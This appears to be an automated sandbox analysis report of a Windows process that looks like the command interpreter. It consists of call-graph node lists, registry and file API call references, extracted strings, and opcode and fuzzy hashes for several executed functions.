35b16 23059->23060 23061 35afe 23059->23061 23064 1ab7f 2 API calls 23060->23064 23063 178e4 451 API calls 23061->23063 23062 35990 RegEnumKeyExW 23065 35ae7 23062->23065 23062->23076 23063->23065 23066 35b1d 23064->23066 23069 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 23065->23069 23067 1acb0 451 API calls 23066->23067 23068 35b24 23067->23068 23068->23065 23071 201f5 wcsrchr 23068->23071 23070 35c52 23069->23070 23070->23052 23073 35b3c 23071->23073 23075 35b68 23073->23075 23081 35b7f 23073->23081 23074 35ae2 23078 26c78 4 API calls 23074->23078 23077 178e4 451 API calls 23075->23077 23076->23062 23076->23065 23076->23074 23080 1dc60 2 API calls 23076->23080 23084 19950 451 API calls 23076->23084 23132 362b3 23076->23132 23079 35b74 23077->23079 23078->23065 23083 1dc60 2 API calls 23079->23083 23080->23076 23082 35b9e RegOpenKeyExW 23081->23082 23085 35bd6 23082->23085 23086 35bc4 23082->23086 23083->23065 23084->23076 23088 362b3 456 API calls 23085->23088 23087 178e4 451 API calls 23086->23087 23087->23079 23089 35be7 23088->23089 23090 35c21 23089->23090 23093 35c13 23089->23093 23091 178e4 451 API calls 23090->23091 23092 35c1f 23091->23092 23094 1dc60 2 API calls 23092->23094 23095 19950 451 API calls 23093->23095 23094->23079 23095->23092 23097 36680 23096->23097 23097->23097 23098 3669b 23097->23098 23100 366b0 23097->23100 23099 178e4 451 API calls 23098->23099 23112 366a6 23099->23112 23103 36729 RegOpenKeyExW 23100->23103 23101 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 23102 368da 23101->23102 23102->23052 23104 36831 23103->23104 23106 36755 23103->23106 23105 3689c RegDeleteValueW 23104->23105 23108 3683c RegSetValueExW 23104->23108 23109 368bf RegCloseKey 23105->23109 23110 368af 23105->23110 23107 3681c 23106->23107 23119 36768 23106->23119 23111 178e4 451 API calls 23107->23111 23117 36873 23108->23117 23118 36881 23108->23118 23109->23112 23113 178e4 451 API calls 23110->23113 23111->23112 23112->23101 23114 3687f 23113->23114 23114->23109 23116 367a4 RegCreateKeyExW 23116->23119 23120 36801 23116->23120 23121 19950 451 API calls 23117->23121 23122 178e4 451 API calls 23118->23122 23119->23104 23119->23116 23123 367ea RegCloseKey 23119->23123 23124 178e4 451 API calls 23120->23124 23121->23114 23125 3688a 23122->23125 23123->23119 23124->23112 23126 178e4 451 API calls 23125->23126 23126->23114 23128 1dc60 2 API calls 23127->23128 23129 35f23 23128->23129 23130 1dc60 2 API calls 23129->23130 23131 35ef8 RegCloseKey 23130->23131 23131->23037 23133 362bf 23132->23133 23134 362f3 RegQueryValueExW 23133->23134 23135 362dd RegOpenKeyExW 23133->23135 23136 3631d 23134->23136 23137 3630c 23134->23137 23135->23134 23148 362f0 SetLastError 23135->23148 23141 1dcd0 451 API calls 23136->23141 23136->23148 23138 1acb0 451 API calls 23137->23138 23140 36316 23138->23140 23149 36387 23140->23149 23142 36329 23141->23142 23144 36332 RegQueryValueExW 23142->23144 23142->23148 23144->23140 23146 3634c 23144->23146 23147 1dc60 2 API calls 23146->23147 23147->23148 23148->23140 23150 3636f 23149->23150 23151 3638c RegCloseKey 23149->23151 23150->23076 23151->23150 22535 26ec0 SetUnhandledExceptionFilter 25521 368e0 25522 368f1 25521->25522 25523 368fc 25521->25523 25527 35679 25522->25527 25525 35679 469 API calls 25523->25525 25526 368f6 25525->25526 25552 271a8 25527->25552 25529 35685 RegOpenKeyExW 25530 35780 25529->25530 25531 356bb 25529->25531 25530->25526 25532 1bc30 451 API calls 25531->25532 25533 356cd 25532->25533 25534 356da 25533->25534 25535 20060 5 API calls 25533->25535 25553 357a8 25534->25553 25537 356ed 25535->25537 25539 1acb0 451 API calls 25537->25539 25538 356e4 25604 35799 25538->25604 25541 356f4 25539->25541 25541->25534 25541->25538 25543 35711 25541->25543 25544 35716 25543->25544 25546 20060 5 API calls 25543->25546 25545 178e4 451 API calls 25544->25545 25545->25538 25547 35737 25546->25547 25548 1acb0 451 API calls 25547->25548 25549 3573e 25548->25549 25549->25538 25549->25544 25550 35759 25549->25550 25581 364db 25550->25581 25552->25529 25554 358af 25553->25554 25565 357d0 25553->25565 25556 1ab7f 2 API calls 25554->25556 25555 357da RegEnumKeyExW 25561 35892 25555->25561 25555->25565 25557 358b6 25556->25557 25558 1acb0 451 API calls 25557->25558 25560 358bd 25558->25560 25559 362b3 456 API calls 25559->25565 25560->25561 25566 201f5 wcsrchr 25560->25566 25562 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 25561->25562 25563 35946 25562->25563 25563->25538 25564 35885 GetLastError 25567 178e4 451 API calls 25564->25567 25565->25555 25565->25559 25565->25561 25565->25564 25570 19950 451 API calls 25565->25570 25571 1dc60 2 API calls 25565->25571 25568 358cd 25566->25568 25567->25561 25569 362b3 456 API calls 25568->25569 25573 358df 25569->25573 25570->25565 25571->25565 25572 35913 25574 178e4 451 API calls 25572->25574 25573->25572 25576 35903 25573->25576 25575 3590f 25574->25575 25577 1dc60 2 API calls 25575->25577 25578 19950 451 API calls 25576->25578 25579 35930 25577->25579 25578->25575 25580 1dc60 2 API calls 25579->25580 25580->25561 25582 364e7 25581->25582 25583 3658c RegDeleteKeyExW 25582->25583 25585 36502 RegCreateKeyExW 25582->25585 25584 3659f RegOpenKeyExW 25583->25584 25600 3656b 25583->25600 25587 365cc RegDeleteValueW 25584->25587 25588 365bc 25584->25588 25589 36573 25585->25589 25590 3651e RegSetValueExW RegCloseKey 25585->25590 25586 272ef ApiSetQueryApiSetPresence 25595 36601 25586->25595 25592 365e3 25587->25592 25593 365ec RegCloseKey 25587->25593 25596 178e4 451 API calls 25588->25596 25588->25600 25591 178e4 451 API calls 25589->25591 25590->25589 25601 3655d 25590->25601 25594 3657a 25591->25594 25598 178e4 451 API calls 25592->25598 25593->25600 25599 178e4 451 API calls 25594->25599 25595->25538 25596->25600 25602 365ea 25598->25602 25599->25600 25600->25586 25600->25595 25603 19950 451 API calls 25601->25603 25602->25593 25603->25600 25605 1dc60 2 API calls 25604->25605 25606 357a0 25605->25606 25607 1dc60 2 API calls 25606->25607 25608 35775 RegCloseKey 25607->25608 25608->25530

                                                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 935 2589a-258c6 FindFirstFileExW 936 258c8-258cb 935->936 937 258e1-258ef 936->937 938 258cd-258d3 GetLastError 936->938 940 259a0-259af 937->940 941 258f5 call 259d0 937->941 939 258d8 938->939 942 258da-258de 939->942 944 258fa-258fc 940->944 941->944 946 25902-25909 944->946 947 2598b-25997 FindNextFileW 944->947 951 2590b-2590e 946->951 949 259b4-259c2 FindClose 947->949 950 25999-2599b 947->950 949->951 950->936 952 25910-25918 951->952 953 2593a-2593c 951->953 954 25940-25951 GetProcessHeap HeapAlloc 952->954 955 2591a-25926 952->955 953->939 956 2593e 953->956 959 25953-2595f 954->959 957 25961-2597d GetProcessHeap HeapReAlloc 955->957 958 25928-2592a 955->958 956->938 962 25983-25989 957->962 963 3160b-31623 GetLastError FindClose 957->963 960 25938 958->960 961 2592c-25932 958->961 959->958 960->953 961->960 962->959 963->942
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNELBASE(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?), ref: 000258BB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000258CD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025944
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002594B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002596C
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025973
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002598F
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000259B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0003160B
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00031618
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3609286125-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 806e5c7379ff0a33ad14fbecf42555bb8891fe8346fe8d50069b1f4287456c09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 610b8a82cdd21b61b607836d946b13127c5928affbf299328792a5b3160a90a8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 806e5c7379ff0a33ad14fbecf42555bb8891fe8346fe8d50069b1f4287456c09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31A075205700EFEB148F64ED09A6E3BF5EB46337F204619E592932E0E73998419B1A
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 276 19458-194b2 call 27d90 InitializeProcThreadAttributeList 279 2bdf1-2be05 GetLastError call 35c54 276->279 280 194b8-194e1 UpdateProcThreadAttribute 276->280 282 2be0d-2be2c GetLastError call 35c54 DeleteProcThreadAttributeList 279->282 281 194e7-1957b memset * 2 GetStartupInfoW call 21d90 280->281 280->282 289 19582-19591 call 1acb0 281->289 290 1957d 281->290 291 2be5c-2be5f 282->291 294 19597-1959e 289->294 295 2be49-2be59 _local_unwind4 289->295 290->289 296 195a4-195b0 call 201f5 294->296 297 2be64-2be6b 294->297 295->291 300 195c6-195d2 call 18235 296->300 303 195b2-195c0 lstrcmpW 296->303 297->296 298 2be71-2be78 297->298 298->300 301 2be7e 298->301 308 19706-1970b 300->308 309 195d8-195df 300->309 301->296 303->300 305 2be83-2be88 call 350d8 303->305 305->300 308->309 312 19711-2be94 308->312 310 195e5-19602 CreateProcessW 309->310 311 2bec4 309->311 314 19608-1960c 310->314 317 2bece-2beda GetLastError 311->317 318 2be96 312->318 319 2be9b-2bebf CreateProcessAsUserW 312->319 316 19612-1963c CloseHandle call 1a976 314->316 314->317 322 2bee4-2beeb 316->322 323 19642-19658 316->323 317->322 318->319 319->314 324 2bef9-2bf03 322->324 325 2beed-2bef7 322->325 326 19742-19745 323->326 327 1965e-1966b 323->327 328 2bf05-2bf0c call 272ef 324->328 329 2bf49-2bf4b 324->329 325->324 325->328 331 19671-19681 326->331 327->331 332 19716-1971d 327->332 342 2bf47 328->342 343 2bf0e-2bf16 328->343 329->323 330 2bf51-2bf5f call 1dcd0 329->330 330->295 346 2bf65 330->346 335 19687-1968d call 181ec 331->335 336 19728-1972b 331->336 332->331 337 19723 332->337 350 19692-196c9 call 19abf call 1a976 335->350 344 19731-19733 336->344 345 2bfdb-2bfe3 336->345 341 2bf6a-2bf71 337->341 341->331 349 2bf77-2bf7e 341->349 342->329 351 2bf18 343->351 352 2bf1d-2bf45 343->352 347 196e6-19703 call 1974a 344->347 353 19735-19740 344->353 345->347 348 2bfe9-2bff6 CloseHandle 345->348 346->341 348->347 349->331 355 2bf84-2bf86 349->355 366 2bfac-2bfaf 350->366 367 196cf 350->367 351->352 352->329 353->347 355->331 358 2bf8c-2bf8e 355->358 358->326 361 2bf94-2bfa1 call 35f2b 358->361 361->331 369 2bfa7 361->369 366->367 370 2bfb5-2bfcc call 19abf 366->370 368 196d4-196e0 call 1a976 367->368 368->347 375 2bfd1-2bfd6 call 363f3 368->375 369->326 370->368 375->347
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0003C9D0,00000108,00022107,?,00000000,00000000,00000000), ref: 000194AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000194D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 000194F1
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001954A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0001955D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021D90: _wcsnicmp.MSVCRT ref: 00021E14
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNELBASE(00000000,\XCOPY.EXE), ref: 000195B8
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00019602
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00019624
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BDF1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0002BE0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0002BE26
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1449572041-3461277227
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7af1518590ddbed6b93c907c256e2b5bda059e16e6681f4c1b98b90417f92333
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6b1406babd7ab950e4b249626a42d9306312264f0a30951a59db6ae39ffe48d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af1518590ddbed6b93c907c256e2b5bda059e16e6681f4c1b98b90417f92333
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC1A174A043259FEB649B64DC55BEE77B8EF46304F0040AAE60AD7181EB748DC0CF62
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001F410 Relevance: 41.0, APIs: 15, Strings: 8, Instructions: 703COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpmemsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$\$cmd
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1630141434-1113867418
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f6032b907a0f6950f34f90d611b1dafcfeeb019fbb61539c51006a342bc54fdb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 442a044d4e8222f06b033c3ec69fd9e6d40cd13af0c747d65ad9be263ea256f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6032b907a0f6950f34f90d611b1dafcfeeb019fbb61539c51006a342bc54fdb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7642AF746083528BD774EF14D8957FFB2E2AF84304F584538E84A8B291EB78DD85C792
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000200E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 740 200e9-20140 memset call 1e3f0 743 20146-2014b 740->743 744 2e615-2e61d call 21e70 740->744 745 20151-2016a GetModuleFileNameW call 1ec2e 743->745 746 2e627 743->746 750 2e61f-2e621 exit 744->750 751 2e632-2e63e call 1a976 745->751 754 20170-2017e call 1ec2e 745->754 746->751 750->746 758 2e643-2e64f call 1a976 751->758 754->758 759 20184-20192 call 1ec2e 754->759 764 2e654-2e660 call 1a976 758->764 759->764 765 20198-201a4 call 1ec2e 759->765 770 2e665-2e66a 764->770 765->770 771 201aa-201b6 call 1ec2e 765->771 772 2e672-2e67c call 1a62f 770->772 773 2e66c 770->773 778 2e714-2e724 _wcsicmp 771->778 779 201bc-201c4 771->779 780 2e6f8-2e6fd 772->780 781 2e67e-2e691 _wcsupr 772->781 773->772 778->779 784 2e72a-2e734 778->784 782 201c6-201d8 call 18bc7 779->782 783 201ee-201f3 779->783 787 2e705-2e70f call 1a976 780->787 788 2e6ff 780->788 785 2e693 781->785 786 2e699 781->786 794 201e2-201ed call 26b30 782->794 795 201da-201e1 ??_V@YAXPAX@Z 782->795 783->782 784->779 785->786 790 2e69c-2e6a5 786->790 787->778 788->787 790->790 793 2e6a7-2e6b0 790->793 797 2e6b2-2e6b8 793->797 798 2e6ba-2e6ce call 201f5 793->798 795->794 797->798 803 2e6d0-2e6d2 798->803 804 2e6e1-2e6e3 798->804 807 2e6d4 803->807 808 2e6da-2e6df 803->808 805 2e6e5 804->805 806 2e6eb 804->806 805->806 809 2e6f0-2e6f3 call 1fc40 806->809 807->808 808->809 809->780
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002011A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00020156
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC77
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001EC8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECB9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECCF
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECE5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ECF7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: _wcsicmp.MSVCRT ref: 0001ED0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 000201DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • exit.MSVCRT ref: 0002E621
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0002E683
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0002E71A
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2336066422-4197029667
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 14e1db6da90e5237db5dab1c810d39c45d7bc95ab9cc1b92db699c7078146f32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e19d8be47be618caace5b0c7f7879ad7d582539014ae6a18f4cbf2ca1ad93c30
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14e1db6da90e5237db5dab1c810d39c45d7bc95ab9cc1b92db699c7078146f32
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251E730B403668BDF649B60EC996FE73A59F60344F044569E906A7182EF349E818B91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00021CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
